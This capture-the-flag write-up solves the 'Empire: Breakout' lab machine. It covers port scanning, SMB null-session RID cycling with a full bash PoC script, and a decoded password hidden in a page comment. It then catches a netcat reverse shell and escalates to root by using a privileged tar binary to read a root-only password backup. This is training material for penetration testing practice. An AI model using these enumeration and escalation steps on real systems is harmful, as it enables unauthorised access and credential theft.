Empire: Breakout

Port recognition withnmap

┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV empire.vuln -p-   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 13:10 EST
Nmap scan report for empire.vuln (10.0.2.94)
Host is up (0.000073s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
MAC Address: 08:00:27:D3:05:8D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.74 seconds

Nmap reports five ports, 80 for http apache server, 139 and 445 for smb, 10000 for webmin and 20000 for usermin

┌──(root@ghost)-[/home/ghost]
└─# curl http://empire.vuln/
...
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

After curl http://empire.vuln/ we will see default apache webpage and commented brainfuck code

.2uqPEfj3D<P'a-3

Decoded brainfuck string

┌──(root@ghost)-[/home/ghost]
└─# smbclient -L empire.vuln -N            

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

Listing shares with null session login

┌──(root@ghost)-[/home/ghost]
└─# rpcclient -U "" -N empire.vuln
rpcclient $> srvinfo
        BREAKOUT       Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03
rpcclient $> lsaenumsid
found 6 SIDs

S-1-5-32-550
S-1-5-32-548
S-1-5-32-551
S-1-5-32-549
S-1-5-32-544
S-1-1-0
rpcclient $> lookupnames root
root S-1-22-1-0 (User: 1)
rpcclient $> exit

Enumerating smb service with rpcclient null session login, showing server info, listing a few sids and looking for common names in the service

┌──(root@ghost)-[/home/ghost]
└─# for ((i=0;i<=2000;i++));do rpcclient -U "" -N empire.vuln -c "lookupsids S-1-22-1-$i" | grep -P 'User\\[a-z].*' | sed -e 's/Unix User\\//' | sed -e 's/(1)//';done 
S-1-22-1-0 root 
S-1-22-1-1 daemon 
S-1-22-1-2 bin 
S-1-22-1-3 sys 
S-1-22-1-4 sync 
S-1-22-1-5 games 
S-1-22-1-6 man 
S-1-22-1-7 lp 
S-1-22-1-8 mail 
S-1-22-1-9 news 
S-1-22-1-10 uucp 
S-1-22-1-13 proxy 
S-1-22-1-33 www-data 
S-1-22-1-34 backup 
S-1-22-1-38 list 
S-1-22-1-39 irc 
S-1-22-1-41 gnats 
S-1-22-1-101 systemd-timesync 
S-1-22-1-102 systemd-network 
S-1-22-1-103 systemd-resolve 
S-1-22-1-104 messagebus 
S-1-22-1-999 systemd-coredump 
S-1-22-1-1000 cyber

RID Cycling Attack. We found a system user called cyber

┌──(root@ghost)-[/home/ghost]
└─# cat rid-cyklop
#!/bin/bash

# rid-cyklop   by 0bfxgh0st*
# RID Cycling Bruteforce Attack (PoC) script based on rpcclient command (null session)

COL_BLUE="\e[34m"
COL_END="\e[0m"

function GetUsers(){

	if [ -z $1 ] || [ -z $2 ] || [ -z $3 ];
	then
		printf "%s\n\n" "RID Cycling Bruteforce Attack (PoC)"
		printf "%s\n" "Usage bash rid-cyklop <host> <start> <end>"
		printf "%s\n" "Example bash rid-cyklop empire.vuln 0 700"
		exit
	fi

	host=$1
	start=$2
	end=$3
	name='root'

	# trying get sid by lookupnames root user
	get_sid=$(rpcclient -U "" "$host" -N -c "lookupnames $name" | awk '{print $2}')
	if [ -z $get_sid ]
	then
		exit
	fi
	sid=$(echo ${get_sid:0:-1})

	# catching no $name value user error, as | awk '{print $2}' is showing second column and cutting the rest of the output in this case corresponds to 'was' string
	if [ $get_sid == 'was' ];
	then
		printf "%s\n" "Cannot find $name in lookupnames"
		exit
	fi

	printf "${COL_BLUE}+${COL_END} Bruteforcing SIDs (from $sid$start to $sid$end)\n\n"
	for ((n=$start;n<=$end;n++));
	do
		rpcclient -U "" "$host" -N -c "lookupsids $sid$n" | grep -oP 'User\\[a-z].*' | tr -d '(1)' | sed -e 's/User\\//g'
	done

}

GetUsers $1 $2 $3

PoC script

Logged in https://empire.vuln:20000 with cyber user and .2uqPEfj3D<P'a-3 password

Prompt a terminal

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337  
listening on [any] 1337 ...
connect to [10.0.2.15] from empire.vuln [10.0.2.94] 49224
bash: cannot set terminal process group (4404): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$

After executing a bash reverse shell with our netcat listener set first

cyber@breakout:~$ cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

User flag

cyber@breakout:~$ ls -l tar
-rwxr-xr-x 1 root root 531928 Oct 19  2021 tar

File /home/cyber/tar is being executed as root

cyber@breakout:~$ find / '.bak' 2>/dev/null | grep '\.bak'     
/var/backups/.old_pass.bak

cyber@breakout:~$ ls -l /var/backups/.old_pass.bak
-rw------- 1 root root 17 Oct 20  2021 /var/backups/.old_pass.bak

Looking for files in the system with .bak extension

cyber@breakout:~$ ./tar -cf compressed.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ./tar -xf compressed.tar
cyber@breakout:~$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h

Compressing and extracting privileged file with /home/cyber/tar executable

cyber@breakout:~$ su root
Password: Ts&4&YurgtRX(=~h
cat /root/rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity

And we are root